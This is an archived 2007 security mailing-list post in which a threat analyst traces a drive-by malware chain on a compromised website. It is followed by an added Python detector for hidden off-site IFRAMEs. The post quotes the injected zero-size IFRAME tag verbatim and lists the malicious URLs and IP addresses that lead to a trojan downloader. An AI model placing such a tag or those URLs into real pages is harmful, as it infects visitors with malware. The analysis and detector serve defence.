funsec mailing list archives
RE: Chinese Internet Security Response Team Website Hosting Malicious Content
From: <Ivan_Macalintal () trendmicro com>
Date: Tue, 2 Oct 2007 13:45:19 -0700
Yep... CISRT is still VERY MUCH hosting malicious content. More info on the Trend Malware Blog...

I've checked three pages:

http:// www. cisrt.org/enblog/read.php?172 (This is the same link being shown in tech news sites like TheRegister - these guys should be advised to remove this link from their write-ups.)
http:// www. cisrt.org/enblog/
http:// www. cisrt.org/

They still have this IFRAME on the top of the page:

<iframe src=http://mms.nmmmn.com/99916.htm width=0 height=0 frameborder=0></iframe>

http:// mms.nmmmn.com/99916.htm loads oo.js and ax.htm which is full of more obfuscated scripts and at least one IFRAME to http:// 5x.3x7x.cn/t.htm

The file t.htm has another IFRAME to http:// 60.191.247.178/aaa1.htm which in turn has these IFRAME links:

http:// 60.191.247.178/Webxl.htm
http:// 60.191.247.178/wm/wm2.htm
http:// 60.191.247.178/wm/vip.htm
http:// 60.191.247.178/wm/wm4.htm
http:// 60.191.247.178/wm/wm5.htm

And a script at:

http:// js.users.51.la/1023960.js

Where a couple of obfuscated JS'es are also downloaded and executed from:

http:// 60.191.247.178/wm/nick.js
http:// 60.191.247.178/wm/nick2.js

They ultimately download and install http:// mms.nmmmn.com/sms.exe which is a trojan downloader downloading around 20 more binaries...

Regards,

Ivan Macalintal
Senior Threat Analyst
Trend Micro Inc.

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
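Added example, not part of the original post or any Trend Micro tooling: a site owner's check for the kind of injected tag quoted in the message above, an IFRAME that is invisible (zero width or height, or hidden by style) and loaded from another host. The host names and the sample page are constructed; the first sample tag copies the unquoted-attribute shape of the tag in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _is_zero(value):
    """True for "0", "0px", "0%"; False for a missing or non-zero size."""
    m = re.match(r"\s*(\d+(?:\.\d+)?)", value or "")
    return bool(m) and float(m.group(1)) == 0

class HiddenIframeFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (line number, src, reasons)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if _is_zero(a.get("width")) or _is_zero(a.get("height")):
            reasons.append("zero-size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        same_site = host == self.page_host or host.endswith("." + self.page_host)
        # Report only frames that are invisible AND pulled from another host;
        # visible third-party embeds and hidden same-site frames are left alone.
        if reasons and host and not same_site:
            self.findings.append((self.getpos()[0], a["src"], reasons + ["off-site"]))

def find_hidden_iframes(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page; all hosts are placeholders.
SAMPLE = """<html><body>
<iframe src=http://injected.example/1.htm width=0 height=0 frameborder=0></iframe>
<iframe src="http://video.example/embed" width="560" height="315"></iframe>
<iframe src="/local/widget.htm" width="0" height="0"></iframe>
<iframe src="http://other.example/x.htm" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src, reasons in find_hidden_iframes(SAMPLE, "blog.example"):
        print(f"line {line}: {src} ({', '.join(reasons)})")
```

This inspects static markup only, so frames written into the page by obfuscated scripts, like those described further down the chain in the post, need a rendered-DOM or proxy-side check instead.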